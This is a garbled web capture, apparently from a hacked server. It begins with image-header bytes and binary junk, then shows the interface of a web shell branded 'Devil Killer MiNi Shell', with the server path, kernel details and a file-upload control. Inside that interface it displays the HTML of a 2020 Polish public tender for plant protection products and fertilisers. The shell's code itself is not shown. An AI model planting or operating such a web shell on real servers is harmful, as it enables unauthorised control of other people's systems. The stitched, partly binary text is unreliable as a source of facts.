JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200306/521084-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 521084-N-2020 z dnia 2020-03-06 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Szkoła Główna Gospodarstwa Wiejskiego w Warszawie Rolniczy Zakład Doświadczalny im. prof. Adama Skoczylasa w Żelaznej</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Zakup i dostawa środków ochrony roślin oraz pewnych nawozów</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Szkoła Główna Gospodarstwa Wiejskiego w Warszawie Rolniczy Zakład Doświadczalny im. prof. Adama Skoczylasa w Żelaznej</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">17840009200000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Żelazna</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">43</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">96-116</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Dębowa Góra</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">łódzkie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">46 833 01 33</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">konradb90@gmail.com</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">46 831 33 19</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://rzdzelazna.cem.sggw.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">wyodrębniona finansowo jednostka państwowej uczelni wyższej </span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://rzdzelazna.cem.sggw.pl/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">osobiście, pocztą polską lub kurierem</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Żelazna 43, 96-116 Dębowa Góra</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Zakup i dostawa środków ochrony roślin oraz pewnych nawozów</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">4/RZD-ZP/2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiot zamówienia stanowi zakup i dostawa środków ochrony roślin oraz pewnych nawozów, wskazanych we wzorze formularza ofertowego – załącznik nr 1 i 1A do SIWZ. Kod CPV: 24450000-3, 24440000-02.Miejsce wykonania przedmiotu zamówienia i wszystkich części zamówienia:Miejscem realizacji dostaw przedmiotu zamówienia jest Szkoła Główna Gospodarstwa Wiejskiego w Warszawie Rolniczy Zakład Doświadczalny w Żelaznej, Żelazna 43, 96-116 Dębowa Góra i Szkoła Główna Gospodarstwa Wiejskiego w Warszawie Rolniczy Zakład Doświadczalny w Żelaznej Gospodarstwo w Chylicach, Chylice Kolonia, ul. Parkowa 9, 96 – 313 Jaktorów.3. Zamówienie podzielone jest na 54 części (54 zadań) wskazanych w rozdziale IV SIWZ.1. Dopuszcza się złożenie ofert częściowych NIE 0	TAK 1•	Oznaczenie części zamówienia: Zadanie 1, cpv: 24450000-3	Krótki opis części zamówienia:	Puma Uniwersal 069 EW lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 2, cpv: 24450000-3	Krótki opis części zamówienia:	Sekator 125 OD lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 3, cpv: 24450000-3	Krótki opis części zamówienia:	Clyton Cyflux lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 4, cpv: 24450000-3	Krótki opis części zamówienia:	Praktis lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 5, cpv: 24450000-3	Krótki opis części zamówienia:	Flipper lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 6, cpv: 24450000-3	Krótki opis części zamówienia:	Stabilna 750 SL lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 7, cpv: 24450000-3	Krótki opis części zamówienia:	Moddus 250 SC lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 8, cpv: 24450000-3	Krótki opis części zamówienia:	Cerone 480 SL lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 9, cpv: 24450000-3	Krótki opis części zamówienia:	Arcade 880 EC lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 10, cpv: 24450000-3	Krótki opis części zamówienia:	Command 480 EC lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:	•	Oznaczenie części zamówienia: Zadanie 11, cpv: 24450000-3	Krótki opis części zamówienia:	Proman 500 SC lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 12, cpv: 24450000-3	Krótki opis części zamówienia:	Leimay 200 SC lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 13, cpv: 24450000-3	Krótki opis części zamówienia:	Mancolaxyl lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 14, cpv: 24450000-3	Krótki opis części zamówienia:	Carial Star 500 SC lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 15, cpv: 24450000-3	Krótki opis części zamówienia:	Moncut 460 SC lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 16, cpv: 24450000-3	Krótki opis części zamówienia:	Globaztar AZT 250 SC lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 17, cpv: 24450000-3	Krótki opis części zamówienia:	Proteus 110 OD lub równoważny	Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 18, cpv: 24450000-3	Krótki opis części zamówienia:	Carnadine 200 SL lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 19, cpv: 24450000-3	Krótki opis części zamówienia:	Amigo lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:	•	Oznaczenie części zamówienia: Zadanie 20, cpv: 24450000-3	Krótki opis części zamówienia:	Select Super 120 EC lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 21, cpv: 24450000-3	Krótki opis części zamówienia:	Sencor Liquid 600 SC lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 22, cpv: 24450000-3	Krótki opis części zamówienia:	Spuma lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 23, cpv: 24450000-3	Krótki opis części zamówienia:	Toprex 375 SC lub równoważny	Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 24, cpv: 24450000-3	Krótki opis części zamówienia:	Nurelle D 550 EC lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:	•	Oznaczenie części zamówienia: Zadanie 25, cpv: 24450000-3	Krótki opis części zamówienia:	Dursban 480 EC lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 26, cpv: 24450000-3	Krótki opis części zamówienia:	Cyperkill Max 500 EC lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 27, cpv: 24450000-3	Krótki opis części zamówienia:	Propulse 250 SC lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 28, cpv: 24450000-3	Krótki opis części zamówienia:	Globagran 480 SL lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 29, cpv: 24450000-3	Krótki opis części zamówienia:	Karate Zeon 050 CS lub równoważny	Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 30, cpv: 24450000-3	Krótki opis części zamówienia:	Goltix-S 700SC lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:	•	Oznaczenie części zamówienia: Zadanie 31, cpv: 24450000-3	Krótki opis części zamówienia:	Venzar 80 WP lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 32, cpv: 24450000-3	Krótki opis części zamówienia:	Sulcotrek 500 SC lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 33, cpv: 24450000-3	Krótki opis części zamówienia:	Ikanos 040 OD lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 34, cpv: 24450000-3	Krótki opis części zamówienia:	Roundup 360 SL lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 35, cpv: 24440000-0	Krótki opis części zamówienia:	FCA Microphos BTC lub równoważny	Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 36, cpv: 24440000-0	Krótki opis części zamówienia:	Siarczan Magnezu o minimalnej zawartości MgO 16% i SO3 32% Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 37, cpv: 24440000-0	Krótki opis części zamówienia:	ADOB PO lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 38, cpv: 24440000-0	Krótki opis części zamówienia:	Florovit lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 39, cpv: 24440000-0	Krótki opis części zamówienia:	ADOB Mo lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 40, cpv: 24440000-0	Krótki opis części zamówienia:	Pekacid ICL Everris 0-60-20 lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 41, cpv: 24440000-0	Krótki opis części zamówienia:	Agroleaf Crop Potatoes lub równoważny	Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 42, cpv: 24440000-0	Krótki opis części zamówienia:	Dr Green Ziemniak lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:	•	Oznaczenie części zamówienia: Zadanie 43, cpv: 24440000-0	Krótki opis części zamówienia:	Dr Green Rzepak lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 44, cpv: 24440000-0	Krótki opis części zamówienia:	Dr Green Zboża lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 45, cpv: 24440000-0	Krótki opis części zamówienia:	Dr Green Kukurydza lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne informacje dotyczące części zamówienia:•	Oznaczenie części zamówienia: Zadanie 46, cpv: 24440000-0	Krótki opis części zamówienia:	Dr Green Warzywa lub równoważny Miejsce wykonania części przedmiotu zamówienia: Podano w dziale III SIWZ	Inne 